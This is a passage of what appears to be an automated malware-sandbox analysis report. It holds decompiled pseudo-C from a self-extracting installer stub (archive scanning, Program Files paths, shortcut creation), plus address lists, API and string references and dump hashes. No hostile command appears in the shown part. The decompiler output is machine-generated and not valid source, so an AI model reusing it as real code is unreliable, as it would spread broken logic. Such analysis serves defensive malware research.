									__eax = E0100FE56();
									 *(__ebp - 0x14) = 2;
								} else {
									__eflags = __eax - 0x54;
									__eax = __ebp - 0x4d08;
									if(__eflags == 0) {
										_push(0x105ab82);
										_push(__eax);
										__eax = E0100FE56();
										 *(__ebp - 0x14) = 7;
									} else {
										_push(0x105cb82);
										_push(__eax);
										__eax = E0100FE56();
										 *(__ebp - 0x14) = 0x10;
									}
								}
								__eax = 0;
								 *(__ebp - 0x9d58) = __ax;
								 *(__ebp - 0x3d08) = __ax;
								__ebp - 0x19d58 = __ebp - 0x6d50;
								__eax = E010257E6(__ebp - 0x6d50, __ebp - 0x19d58);
								_pop(__ecx);
								_pop(__ecx);
								_push(0x22);
								_pop(__ebx);
								__eflags =  *(__ebp - 0x6d50) - __bx;
								if( *(__ebp - 0x6d50) != __bx) {
									__ebp - 0x6d50 = E0100A180(__ebp - 0x6d50);
									__eflags = __al;
									if(__al != 0) {
										goto L160;
									}
									__ebx = __edi;
									__esi = __ebp - 0x6d50;
									__eflags =  *(__ebp - 0x6d50) - __bx;
									if( *(__ebp - 0x6d50) == __bx) {
										goto L160;
									}
									_push(0x20);
									_pop(__ecx);
									do {
										__eax = __esi->i & 0x0000ffff;
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											L148:
											__edi = __eax;
											__eax = 0;
											__esi->i = __ax;
											__ebp - 0x6d50 = E0100A180(__ebp - 0x6d50);
											__eflags = __al;
											if(__al == 0) {
												__esi->i = __di;
												L156:
												_push(0x20);
												_pop(__ecx);
												__edi = 0;
												__eflags = 0;
												goto L157;
											}
											_push(0x2f);
											_pop(__eax);
											__ebx = __esi;
											__eflags = __di - __ax;
											if(__di != __ax) {
												_push(0x20);
												_pop(__eax);
												do {
													__esi =  &(__esi->i);
													__eflags = __esi->i - __ax;
												} while (__esi->i == __ax);
												_push(__esi);
												__eax = __ebp - 0x3d08;
												L154:
												_push(__eax);
												__eax = E010257E6();
												_pop(__ecx);
												_pop(__ecx);
												 *__ebx = __di;
												goto L156;
											}
											 *(__ebp - 0x3d08) = __ax;
											__eax =  &(__esi->i);
											_push( &(__esi->i));
											__eax = __ebp - 0x3d06;
											goto L154;
										}
										_push(0x2f);
										_pop(__edx);
										__eflags = __ax - __dx;
										if(__ax != __dx) {
											goto L157;
										}
										goto L148;
										L157:
										__esi =  &(__esi->i);
										__eflags = __esi->i - __di;
									} while (__esi->i != __di);
									__eflags = __ebx;
									if(__ebx != 0) {
										__eax = 0;
										__eflags = 0;
										 *__ebx = __ax;
									}
									goto L160;
								} else {
									__ebp - 0x19d56 = __ebp - 0x6d50;
									E010257E6(__ebp - 0x6d50, __ebp - 0x19d56) = __ebp - 0x6d4e;
									_push(__ebx);
									_push(__ebp - 0x6d4e);
									__eax = E010215E8(__ecx);
									__esp = __esp + 0x10;
									__eflags = __eax;
									if(__eax != 0) {
										__ecx = 0;
										 *__eax = __cx;
										__ebp - 0x3d08 = E010257E6(__ebp - 0x3d08, __ebp - 0x3d08);
										_pop(__ecx);
										_pop(__ecx);
									}
									L160:
									__eflags =  *((short*)(__ebp - 0x11d58));
									__ebx = 0x800;
									if( *((short*)(__ebp - 0x11d58)) != 0) {
										__ebp - 0x9d58 = __ebp - 0x11d58;
										__eax = E0100B239(__ebp - 0x11d58, __ebp - 0x9d58, 0x800);
									}
									__ebp - 0xbd58 = __ebp - 0x6d50;
									__eax = E0100B239(__ebp - 0x6d50, __ebp - 0xbd58, __ebx);
									__eflags =  *(__ebp - 0x4d08);
									if(__eflags == 0) {
										__ebp - 0x4d08 = E0101AB2E(__ecx, __ebp - 0x4d08,  *(__ebp - 0x14));
									}
									__ebp - 0x4d08 = E0100B207(__eflags, __ebp - 0x4d08, __ebx);
									__eflags =  *((short*)(__ebp - 0x17d58));
									if(__eflags != 0) {
										__ebp - 0x17d58 = __ebp - 0x4d08;
										E0100FE2E(__eflags, __ebp - 0x4d08, __ebp - 0x17d58, __ebx) = __ebp - 0x4d08;
										__eax = E0100B207(__eflags, __ebp - 0x4d08, __ebx);
									}
									__ebp - 0x4d08 = __ebp - 0xcd58;
									__eax = E010257E6(__ebp - 0xcd58, __ebp - 0x4d08);
									__eflags =  *(__ebp - 0x13d58);
									__eax = __ebp - 0x13d58;
									_pop(__ecx);
									_pop(__ecx);
									if(__eflags == 0) {
										__eax = __ebp - 0x19d58;
									}
									__ebp - 0x4d08 = E0100FE2E(__eflags, __ebp - 0x4d08, __ebp - 0x4d08, __ebx);
									__eax = __ebp - 0x4d08;
									__eflags = E0100B493(__ebp - 0x4d08);
									if(__eflags == 0) {
										L170:
										__ebp - 0x4d08 = E0100FE2E(__eflags, __ebp - 0x4d08, L".lnk", __ebx);
										goto L171;
									} else {
										__eflags = __eax;
										if(__eflags == 0) {
											L171:
											_push(1);
											__eax = __ebp - 0x4d08;
											_push(__ebp - 0x4d08);
											E0100A04F(__ecx, __ebp) = __ebp - 0xbd58;
											__ebp - 0xad58 = E010257E6(__ebp - 0xad58, __ebp - 0xbd58);
											_pop(__ecx);
											_pop(__ecx);
											__ebp - 0xad58 = E0100BCCF(__eflags, __ebp - 0xad58);
											__ecx =  *(__ebp - 0x3d08) & 0x0000ffff;
											__eax = __ebp - 0x3d08;
											__ecx =  ~( *(__ebp - 0x3d08) & 0x0000ffff);
											__edx = __ebp - 0x9d58;
											__esi = __ebp - 0xad58;
											asm("sbb ecx, ecx");
											__ecx =  ~( *(__ebp - 0x3d08) & 0x0000ffff) & __ebp - 0x00003d08;
											 *(__ebp - 0x9d58) & 0x0000ffff =  ~( *(__ebp - 0x9d58) & 0x0000ffff);
											asm("sbb eax, eax");
											__eax =  ~( *(__ebp - 0x9d58) & 0x0000ffff) & __ebp - 0x00009d58;
											 *(__ebp - 0xad58) & 0x0000ffff =  ~( *(__ebp - 0xad58) & 0x0000ffff);
											__eax = __ebp - 0x15d58;
											asm("sbb edx, edx");
											__edx =  ~( *(__ebp - 0xad58) & 0x0000ffff) & __esi;
											E0101A5E4(__ebp - 0x15d58) = __ebp - 0x4d08;
											__ebp - 0xbd58 = E01019BDC(__ecx, __edi, __ebp - 0xbd58, __ebp - 0x4d08,  ~( *(__ebp - 0xad58) & 0x0000ffff) & __esi, __ebp - 0xbd58,  ~( *(__ebp - 0x9d58) & 0x0000ffff) & __ebp - 0x00009d58,  ~( *(__ebp - 0x3d08) & 0x0000ffff) & __ebp - 0x00003d08);
											__eflags =  *(__ebp - 0xcd58);
											if( *(__ebp - 0xcd58) != 0) {
												_push(__edi);
												__eax = __ebp - 0xcd58;
												_push(__ebp - 0xcd58);
												_push(5);
												_push(0x1000);
												__eax =  *0x1062078();
											}
											goto L175;
										}
										goto L170;
									}
								}
							case 0xa:
								__eflags = __ebx - 7;
								if(__ebx == 7) {
									 *0x104a470 = 1;
								}
								goto L175;
							case 0xb:
								__eax =  *(__ebp - 0x3508) & 0x0000ffff;
								__eax = E01026420( *(__ebp - 0x3508) & 0x0000ffff);
								__eflags = __eax - 0x46;
								if(__eax == 0x46) {
									 *0x1048461 = 1;
								} else {
									__eflags = __eax - 0x55;
									if(__eax == 0x55) {
										 *0x1048462 = 1;
									} else {
										__eax = 0;
										 *0x1048461 = __al;
										 *0x1048462 = __al;
									}
								}
								goto L175;
							case 0xc:
								 *0x105ec99 = 1;
								__eax = __eax + 0x105ec99;
								_t123 = __esi + 0x39;
								 *_t123 =  *(__esi + 0x39) + __esp;
								__eflags =  *_t123;
								__ebp = 0xffffcaf8;
								if( *_t123 != 0) {
									_t125 = __ebp - 0x3508; // 0xffff95f0
									__eax = _t125;
									_push(_t125);
									 *0x103e5fc = E01011798();
								}
								goto L175;
						}
						L4:
						_push(0x1000);
						_push(_t306);
						_push(_t231);
						_t231 = E0101A6C7();
						_t306 = _t306 + 0x2000;
						_t302 = _t302 - 1;
						if(_t302 != 0) {
							goto L4;
						} else {
							_t307 = _t302;
							goto L6;
						}
						L175:
						_push(0x1000);
						_t216 = _t311 - 0x15; // 0xffffcae3
						_t217 = _t311 - 0xd; // 0xffffcaeb
						_t218 = _t311 - 0x3508; // 0xffff95f0
						_t219 = _t311 - 0xfd58; // 0xfffecda0
						_push( *((intOrPtr*)(_t311 + 0xc)));
						_t226 = E0101AA36();
						_t287 =  *((intOrPtr*)(_t311 + 0x10));
						 *((intOrPtr*)(_t311 + 0xc)) = _t226;
					} while (_t226 != 0);
				}
			}

0x0101bdf5
0x0101bdfa
0x0101bdff
0x0101be04
0x0101be0d
0x0101ca90
0x0101ca93
0x0101ca9d
0x0101ca9d
0x0101be13
0x0101be1b
0x0101be1f
0x0101be26
0x0101be2d
0x0101be2e
0x0101be31
0x0101be38
0x0101be3d
0x0101be44
0x0101be49
0x0101be4b
0x0101be51
0x0101be57
0x0101be57
0x00000000
0x0101be71
0x0101be88
0x0101be8c
0x00000000
0x0101be8e
0x00000000
0x0101be8e
0x0101be8c
0x0101be96
0x00000000
0x00000000
0x0101be9c
0x00000000
0x0101bea3
0x0101bea6
0x0101beb9
0x0101bedf
0x0101bef3
0x0101bef6
0x0101bf01
0x0101c045
0x0101c045
0x0101c04d
0x0101c053
0x0101c058
0x0101c05a
0x00000000
0x00000000
0x0101bf13
0x0101bf19
0x0101bf1f
0x0101bfc5
0x0101bfcc
0x0101bfd2
0x0101bfd5
0x00000000
0x00000000
0x0101bfde
0x0101bfe4
0x0101bfe6
0x00000000
0x0101bfe8
0x0101bfe8
0x0101bfea
0x0101bfeb
0x0101bfef
0x0101c003
0x0101c008
0x0101c012
0x0101c018
0x0101c01b
0x0101bfed
0x0101bfed
0x0101bfee
0x00000000
0x0101c01d
0x0101c02b
0x0101c031
0x0101c033
0x0101c03f
0x0101c03f
0x00000000
0x0101c033
0x0101c01b
0x0101bfe6
0x0101bf34
0x0101bf41
0x0101bf52
0x0101bf55
0x0101bf58
0x0101bf6b
0x0101bf72
0x0101bf77
0x0101bf79
0x00000000
0x00000000
0x0101bf7f
0x0101bf86
0x0101bf8b
0x0101bf90
0x0101bf9c
0x0101bfa1
0x0101bfa4
0x0101bfab
0x0101bfad
0x0101bfae
0x0101bfb8
0x0101bfbe
0x0101bfbf
0x00000000
0x0101bfbf
0x0101bf61
0x0101bf67
0x0101bf69
0x00000000
0x00000000
0x00000000
0x0101bf69
0x0101c060
0x0101c06a
0x0101c06a
0x00000000
0x00000000
0x0101c074
0x0101c076
0x0101c07c
0x0101c081
0x0101c083
0x0101c086
0x0101c088
0x0101c095
0x0101c09a
0x0101c09b
0x0101c09b
0x0101c09c
0x0101c09f
0x0101c0a1
0x0101c0ab
0x0101c0ae
0x0101c0b4
0x0101c0b6
0x0101c0a3
0x0101c0a3
0x0101c0a3
0x0101c0bb
0x0101c0bd
0x0101c0c6
0x0101c0c6
0x0101c0c9
0x0101c0ce
0x0101c0d7
0x0101c0d8
0x0101c0de
0x0101c0e3
0x0101c0e6
0x0101c0e8
0x0101c0ea
0x0101c0ef
0x0101c0f1
0x0101c0f3
0x0101c0f3
0x0101c0f5
0x0101c0f5
0x0101c0fa
0x0101c0ff
0x0101c100
0x0101c100
0x0101c101
0x0101c103
0x0101c10a
0x0101c10f
0x0101c103
0x00000000
0x00000000
0x0101c115
0x0101c117
0x0101c127
0x0101c127
0x00000000
0x00000000
0x0101c132
0x0101c134
0x00000000
0x00000000
0x0101c13a
0x0101c141
0x00000000
0x00000000
0x0101c147
0x0101c149
0x0101c14f
0x0101c151
0x0101c158
0x0101c159
0x0101c160
0x0101c162
0x0101c162
0x0101c169
0x0101c16e
0x0101c174
0x0101c176
0x00000000
0x0101c17c
0x0101c17c
0x0101c17f
0x0101c181
0x0101c182
0x0101c185
0x0101c1ae
0x0101c1ae
0x0101c1b1
0x0101c296
0x0101c29f
0x0101c2a4
0x0101c2a4
0x0101c2a6
0x0101c2a6
0x0101c2a8
0x0101c2aa
0x0101c2b1
0x0101c2b6
0x0101c2b7
0x0101c2b8
0x0101c2ba
0x0101c2bc
0x0101c2c0
0x0101c2c2
0x0101c2c2
0x0101c2c4
0x0101c2c4
0x0101c2c0
0x0101c2c8
0x0101c2ce
0x0101c2db
0x0101c2e2
0x0101c2f2
0x0101c2fc
0x0101c30a
0x0101c310
0x0101c318
0x0101c31d
0x0101c31e
0x0101c31f
0x0101c321
0x0101c335
0x0101c335
0x00000000
0x0101c321
0x0101c1b7
0x0101c1ba
0x0101c1c7
0x0101c1c7
0x0101c1ca
0x0101c1cc
0x0101c1cd
0x0101c1cf
0x0101c1d0
0x0101c1d5
0x0101c1da
0x0101c1e0
0x0101c1e2
0x0101c1e4
0x0101c1e7
0x0101c1ee
0x0101c1ef
0x0101c1f5
0x0101c1f6
0x0101c1f9
0x0101c1fa
0x0101c1fb
0x0101c200
0x0101c203
0x0101c209
0x0101c212
0x0101c215
0x0101c21a
0x0101c21c
0x0101c21e
0x0101c220
0x0101c220
0x0101c222
0x0101c222
0x0101c224
0x0101c224
0x0101c22c
0x0101c233
0x0101c235
0x0101c23c
0x0101c242
0x0101c244
0x0101c245
0x0101c24d
0x0101c25c
0x0101c25c
0x0101c24d
0x0101c267
0x0101c269
0x0101c278
0x0101c27e
0x0101c284
0x0101c28f
0x0101c28f
0x00000000
0x0101c284
0x0101c1bc
0x0101c1c1
0x00000000
0x00000000
0x00000000
0x0101c1c1
0x0101c187
0x0101c18b
0x00000000
0x00000000
0x0101c18d
0x0101c190
0x0101c192
0x0101c195
0x00000000
0x00000000
0x0101c1a4
0x00000000
0x0101c1a4
0x00000000
0x0101c340
0x0101c341
0x0101c346
0x0101c348
0x0101c34a
0x0101c34b
0x0101c34b
0x00000000
0x0101c381
0x0101c388
0x0101c38a
0x0101c38a
0x0101c38c
0x0101c3bb
0x0101c3bb
0x0101c3c1
0x00000000
0x0101c3c1
0x0101c38e
0x0101c38e
0x0101c391
0x0101c3aa
0x0101c3b0
0x0101c3b0
0x00000000
0x0101c3b0
0x0101c393
0x0101c393
0x0101c396
0x00000000
0x00000000
0x0101c398
0x0101c398
0x0101c39b
0x00000000
0x00000000
0x0101c3a1
0x00000000
0x00000000
0x0101c40e
0x0101c410
0x0101c417
0x0101c418
0x0101c41e
0x0101c426
0x0101c4ca
0x0101c4ca
0x0101c4ce
0x0101c4e5
0x0101c4e5
0x0101c4e9
0x0101c4ef
0x0101c4f2
0x0101c4f8
0x0101c4fa
0x0101c4fb
0x0101c4fc
0x0101c4fd
0x0101c500
0x0101c500
0x0101c4f2
0x00000000
0x0101c4e9
0x0101c4d0
0x0101c4d3
0x00000000
0x00000000
0x0101c4d9
0x0101c4db
0x0101c4dc
0x0101c4dd
0x0101c4e0
0x00000000
0x0101c4e0
0x0101c42c
0x0101c432
0x0101c434
0x0101c435
0x0101c43a
0x0101c43b
0x0101c43c
0x0101c43e
0x00000000
0x00000000
0x0101c444
0x0101c444
0x0101c447
0x0101c44a
0x0101c44a
0x0101c44c
0x0101c44f
0x0101c455
0x0101c457
0x0101c458
0x0101c45e
0x0101c45f
0x0101c464
0x0101c466
0x0101c468
0x00000000
0x00000000
0x0101c46a
0x0101c472
0x00000000
0x00000000
0x0101c479
0x0101c480
0x0101c485
0x0101c48c
0x0101c48e
0x0101c490
0x0101c497
0x0101c49c
0x0101c49e
0x0101c4a0
0x0101c4a2
0x0101c4a2
0x0101c4a8
0x0101c4af
0x0101c4b4
0x0101c4b6
0x0101c4b8
0x0101c4ba
0x0101c4ba
0x0101c4bb
0x0101c4bd
0x0101c4c3
0x0101c4c4
0x0101c4c4
0x0101c4c7
0x00000000
0x00000000
0x0101c534
0x0101c537
0x0101c6b8
0x0101c6b8
0x0101c6bb
0x0101c6c1
0x0101c6c8
0x0101c6ca
0x0101c6ca
0x0101c6d4
0x0101c6d4
0x00000000
0x0101c6bb
0x0101c53d
0x0101c543
0x0101c551
0x0101c55d
0x0101c55f
0x0101c561
0x0101c566
0x0101c566
0x0101c57e
0x0101c58b
0x0101c590
0x0101c592
0x00000000
0x00000000
0x0101c564
0x0101c564
0x0101c565
0x0101c565
0x0101c59e
0x0101c5a4
0x0101c5ac
0x00000000
0x00000000
0x0101c5b2
0x0101c5b9
0x00000000
0x00000000
0x0101c5bf
0x0101c5c1
0x0101c5c8
0x0101c5ce
0x0101c5d0
0x0101c5d1
0x0101c5d6
0x0101c5d7
0x0101c5d8
0x0101c5da
0x0101c62e
0x0101c62e
0x0101c636
0x0101c644
0x0101c655
0x0101c663
0x0101c663
0x0101c66f
0x0101c674
0x0101c676
0x0101c686
0x0101c690
0x0101c695
0x0101c698
0x00000000
0x0101c69e
0x0101c6a3
0x0101c6a3
0x0101c6a5
0x0101c6ac
0x0101c6b2
0x00000000
0x0101c6b2
0x0101c698
0x0101c5dc
0x0101c5de
0x0101c5e0
0x0101c5e7
0x00000000
0x00000000
0x0101c5e9
0x0101c5eb
0x0101c5f1
0x0101c5f1
0x0101c5f5
0x00000000
0x00000000
0x0101c5f7
0x0101c5f8
0x0101c5fe
0x0101c601
0x0101c603
0x0101c606
0x00000000
0x00000000
0x00000000
0x0101c608
0x0101c615
0x0101c61f
0x0101c624
0x0101c624
0x0101c626
0x00000000
0x00000000
0x0101c6e0
0x0101c6e3
0x0101c6e5
0x0101c6ec
0x0101c6ee
0x0101c6f4
0x0101c6f5
0x0101c6fa
0x0101c6fb
0x0101c6fb
0x0101c700
0x0101c703
0x0101c709
0x0101c709
0x0101c70e
0x00000000
0x00000000
0x0101c71a
0x0101c71d
0x00000000
0x00000000
0x0101c723
0x0101c725
0x0101c72c
0x0101c734
0x0101c73a
0x0101c73f
0x0101c742
0x0101c777
0x0101c77c
0x0101c782
0x0101c783
0x0101c788
0x0101c744
0x0101c744
0x0101c747
0x0101c74d
0x0101c763
0x0101c768
0x0101c769
0x0101c76e
0x0101c74f
0x0101c74f
0x0101c754
0x0101c755
0x0101c75a
0x0101c75a
0x0101c74d
0x0101c78f
0x0101c791
0x0101c798
0x0101c7a6
0x0101c7ad
0x0101c7b2
0x0101c7b3
0x0101c7b4
0x0101c7b6
0x0101c7b7
0x0101c7be
0x0101c80e
0x0101c813
0x0101c815
0x00000000
0x00000000
0x0101c81b
0x0101c81d
0x0101c823
0x0101c82a
0x00000000
0x00000000
0x0101c82c
0x0101c82e
0x0101c82f
0x0101c82f
0x0101c832
0x0101c835
0x0101c83f
0x0101c83f
0x0101c841
0x0101c843
0x0101c84d
0x0101c852
0x0101c854
0x0101c892
0x0101c895
0x0101c895
0x0101c897
0x0101c898
0x0101c898
0x00000000
0x0101c898
0x0101c856
0x0101c858
0x0101c859
0x0101c85b
0x0101c85e
0x0101c873
0x0101c875
0x0101c876
0x0101c876
0x0101c879
0x0101c879
0x0101c87e
0x0101c87f
0x0101c885
0x0101c885
0x0101c886
0x0101c88b
0x0101c88c
0x0101c88d
0x00000000
0x0101c88d
0x0101c860
0x0101c867
0x0101c86a
0x0101c86b
0x00000000
0x0101c86b
0x0101c837
0x0101c839
0x0101c83a
0x0101c83d
0x00000000
0x00000000
0x00000000
0x0101c89a
0x0101c89a
0x0101c89d
0x0101c89d
0x0101c8a2
0x0101c8a4
0x0101c8a6
0x0101c8a6
0x0101c8a8
0x0101c8a8
0x00000000
0x0101c7c0
0x0101c7c7
0x0101c7d3
0x0101c7d9
0x0101c7da
0x0101c7db
0x0101c7e0
0x0101c7e3
0x0101c7e5
0x0101c7eb
0x0101c7ed
0x0101c7fb
0x0101c800
0x0101c801
0x0101c801
0x0101c8ab
0x0101c8ab
0x0101c8b3
0x0101c8b8
0x0101c8c2
0x0101c8c9
0x0101c8c9
0x0101c8d6
0x0101c8dd
0x0101c8e2
0x0101c8ea
0x0101c8f6
0x0101c8f6
0x0101c903
0x0101c908
0x0101c910
0x0101c91a
0x0101c927
0x0101c92e
0x0101c92e
0x0101c93a
0x0101c941
0x0101c946
0x0101c94e
0x0101c954
0x0101c955
0x0101c956
0x0101c958
0x0101c958
0x0101c96d
0x0101c972
0x0101c97e
0x0101c980
0x0101c991
0x0101c99e
0x00000000
0x0101c982
0x0101c98d
0x0101c98f
0x0101c9a3
0x0101c9a3
0x0101c9a5
0x0101c9ab
0x0101c9b1
0x0101c9bf
0x0101c9c4
0x0101c9c5
0x0101c9cd
0x0101c9d2
0x0101c9d9
0x0101c9df
0x0101c9e1
0x0101c9e7
0x0101c9ed
0x0101c9ef
0x0101c9f8
0x0101c9fb
0x0101c9fd
0x0101ca06
0x0101ca09
0x0101ca0f
0x0101ca12
0x0101ca1b
0x0101ca2a
0x0101ca2f
0x0101ca37
0x0101ca39
0x0101ca3a
0x0101ca40
0x0101ca41
0x0101ca43
0x0101ca48
0x0101ca48
0x00000000
0x0101ca37
0x00000000
0x0101c98f
0x0101c980
0x00000000
0x0101ca50
0x0101ca53
0x0101ca55
0x0101ca55
0x00000000
0x00000000
0x0101c3cd
0x0101c3d5
0x0101c3db
0x0101c3de
0x0101c402
0x0101c3e0
0x0101c3e0
0x0101c3e3
0x0101c3f6
0x0101c3e5
0x0101c3e5
0x0101c3e7
0x0101c3ec
0x0101c3ec
0x0101c3e3
0x00000000
0x00000000
0x0101c50a
0x0101c50b
0x0101c510
0x0101c510
0x0101c510
0x0101c513
0x0101c518
0x0101c51e
0x0101c51e
0x0101c524
0x0101c52a
0x0101c52a
0x00000000
0x00000000
0x0101be58
0x0101be58
0x0101be5d
0x0101be5e
0x0101be5f
0x0101be64
0x0101be6a
0x0101be6d
0x00000000
0x0101be6f
0x0101be6f
0x00000000
0x0101be6f
0x0101ca5c
0x0101ca5c
0x0101ca61
0x0101ca65
0x0101ca69
0x0101ca70
0x0101ca77
0x0101ca7a
0x0101ca7f
0x0101ca82
0x0101ca85
0x0101ca8f

APIs

__EH_prolog.LIBCMT ref: 0101BDFA

Part of subcall function 0101AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0101AAFE

SetWindowTextW.USER32(?,?), ref: 0101C127
_wcsrchr.LIBVCRUNTIME ref: 0101C2B1
GetDlgItem.USER32(?,00000066), ref: 0101C2EC
SetWindowTextW.USER32(00000000,?), ref: 0101C2FC
SendMessageW.USER32(00000000,00000143,00000000,0104A472), ref: 0101C30A
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0101C335

Strings

ProgramFilesDir, xrefs: 0101C1FB
%s.%d.tmp, xrefs: 0101BFF6
<br>, xrefs: 0101C08A
Software\Microsoft\Windows\CurrentVersion, xrefs: 0101C1D0

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 3564274579-312220925
Opcode ID: 195e75614aebe17ed866b18c17816e1d65fac8ef8d79511dc5a1f78d94015607
Instruction ID: 4d35232b2b0a6e1ae0eae5235c8fd5ba3da58a369006888f21f04e6106bcfc27
Opcode Fuzzy Hash: 195e75614aebe17ed866b18c17816e1d65fac8ef8d79511dc5a1f78d94015607
Instruction Fuzzy Hash: AFE1DA72D40129AAEB36DBA4DD44DDF77BCAF18314F0000A6F689E7054EB78DA848F50

Uniqueness

Uniqueness Score: -1.00%

Function 0100D341, Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 555
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E0100D341(intOrPtr* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t200;
				void* _t201;
				WCHAR* _t202;
				void* _t207;
				signed int _t216;
				signed int _t219;
				signed int _t222;
				signed int _t232;
				void* _t233;
				void* _t236;
				signed int _t239;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t248;
				signed int _t252;
				signed int _t266;
				signed int _t271;
				signed int _t272;
				signed int _t274;
				signed int _t276;
				signed int _t277;
				void* _t278;
				signed int _t283;
				char* _t284;
				signed int _t288;
				short _t291;
				void* _t292;
				signed int _t298;
				signed int _t303;
				void* _t306;
				void* _t308;
				void* _t311;
				signed int _t320;
				intOrPtr* _t322;
				unsigned int _t332;
				signed int _t334;
				unsigned int _t337;
				signed int _t340;
				void* _t347;
				signed int _t352;
				signed int _t355;
				signed int _t356;
				signed int _t361;
				signed int _t365;
				void* _t374;
				signed int _t376;
				signed int _t377;
				void* _t378;
				void* _t379;
				intOrPtr* _t380;
				signed int _t381;
				signed int _t384;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				intOrPtr* _t391;
				signed int _t393;
				void* _t394;
				void* _t396;
				void* _t398;
				void* _t402;
				void* _t403;

				_t374 = __edx;
				_t322 = __ecx;
				E0101E28C(E01031F25, _t394);
				E0101E360();
				_t200 = 0x5c;
				_push(0x42f8);
				_push( *((intOrPtr*)(_t394 + 8)));
				_t391 = _t322;
				 *((intOrPtr*)(_t394 - 0x40)) = _t200;
				 *((intOrPtr*)(_t394 - 0x3c)) = _t391;
				_t201 = E010215E8(_t322);
				_t320 = 0;
				_t400 = _t201;
				_t202 = _t394 - 0x12dc;
				if(_t201 != 0) {
					E0100FE56(_t202,  *((intOrPtr*)(_t394 + 8)), 0x800);
				} else {
					GetModuleFileNameW(0, _t202, 0x800);
					 *((short*)(E0100BC85(_t400, _t394 - 0x12dc))) = 0;
					E0100FE2E(_t400, _t394 - 0x12dc,  *((intOrPtr*)(_t394 + 8)), 0x800);
				}
				E01009619(_t394 - 0x2304);
				_push(4);
				 *(_t394 - 4) = _t320;
				_push(_t394 - 0x12dc);
				if(E010099B0(_t394 - 0x2304, _t391) == 0) {
					L57:
					_t207 = E01009653(_t394 - 0x2304, _t391); // executed
					 *[fs:0x0] =  *((intOrPtr*)(_t394 - 0xc));
					return _t207;
				} else {
					_t384 = _t320;
					_t402 =  *0x103e5f4 - _t384; // 0x63
					if(_t402 <= 0) {
						L7:
						E01025A90(_t320, _t384, _t391,  *_t391,  *((intOrPtr*)(_t391 + 4)), 4, E0100CFB0);
						E01025A90(_t320, _t384, _t391,  *((intOrPtr*)(_t391 + 0x14)),  *((intOrPtr*)(_t391 + 0x18)), 4, E0100CF10);
						_t398 = _t396 + 0x20;
						 *(_t394 - 0x15) = _t320;
						_t385 = _t384 | 0xffffffff;
						 *(_t394 - 0x2c) = _t320;
						 *(_t394 - 0x20) = _t385;
						while(_t385 == 0xffffffff) {
							 *(_t394 - 0x10) = E01009E40();
							_t298 = E01009BF0(_t394 - 0x2304, _t374, _t394 - 0x4304, 0x2000);
							 *(_t394 - 0x28) = _t298;
							_t388 = _t320;
							_t25 = _t298 - 0x10; // -16
							_t365 = _t25;
							 *(_t394 - 0x30) = _t365;
							if(_t365 < 0) {
								L25:
								_t299 =  *(_t394 - 0x10);
								_t385 =  *(_t394 - 0x20);
								L26:
								E01009D30(_t394 - 0x2304, _t394, _t299 +  *(_t394 - 0x28) + 0xfffffff0, _t320, _t320);
								_t303 =  *(_t394 - 0x2c) + 1;
								 *(_t394 - 0x2c) = _t303;
								__eflags = _t303 - 0x100;
								if(_t303 < 0x100) {
									continue;
								}
								__eflags = _t385 - 0xffffffff;
								if(_t385 == 0xffffffff) {
									goto L57;
								}
								break;
							}
							L10:
							while(1) {
								if( *((char*)(_t394 + _t388 - 0x4304)) != 0x2a ||  *((char*)(_t394 + _t388 - 0x4303)) != 0x2a) {
									L14:
									_t374 = 0x2a;
									if( *((intOrPtr*)(_t394 + _t388 - 0x4304)) != _t374) {
										L18:
										if( *((char*)(_t394 + _t388 - 0x4304)) != 0x52 ||  *((char*)(_t394 + _t388 - 0x4303)) != 0x61) {
											L21:
											_t388 = _t388 + 1;
											if(_t388 >  *(_t394 - 0x30)) {
												goto L25;
											}
											_t298 =  *(_t394 - 0x28);
											continue;
										} else {
											_t306 = E01025EC0(_t394 - 0x4302 + _t388, 0x10338ec, 4);
											_t398 = _t398 + 0xc;
											if(_t306 == 0) {
												goto L57;
											}
											goto L21;
										}
									}
									_t370 = _t394 - 0x4300 + _t388;
									if( *((intOrPtr*)(_t394 - 0x4300 + _t388 - 2)) == _t374 && _t388 <= _t298 + 0xffffffe0) {
										_t308 = E01025808(_t370, L"*messages***", 0xb);
										_t398 = _t398 + 0xc;
										if(_t308 == 0) {
											 *(_t394 - 0x15) = 1;
											goto L24;
										}
									}
									goto L18;
								} else {
									_t311 = E01025EC0(_t394 - 0x4302 + _t388, "*messages***", 0xb);
									_t398 = _t398 + 0xc;
									if(_t311 == 0) {
										L24:
										_t299 =  *(_t394 - 0x10);
										_t385 = _t388 +  *(_t394 - 0x10);
										 *(_t394 - 0x20) = _t385;
										goto L26;
									}
									_t298 =  *(_t394 - 0x28);
									goto L14;
								}
							}
						}
						asm("cdq");
						E01009D30(_t394 - 0x2304, _t394, _t385, _t374, _t320);
						_push(0x200002);
						_t386 = E010235D3(_t394 - 0x2304);
						 *(_t394 - 0x1c) = _t386;
						__eflags = _t386;
						if(_t386 == 0) {
							goto L57;
						}
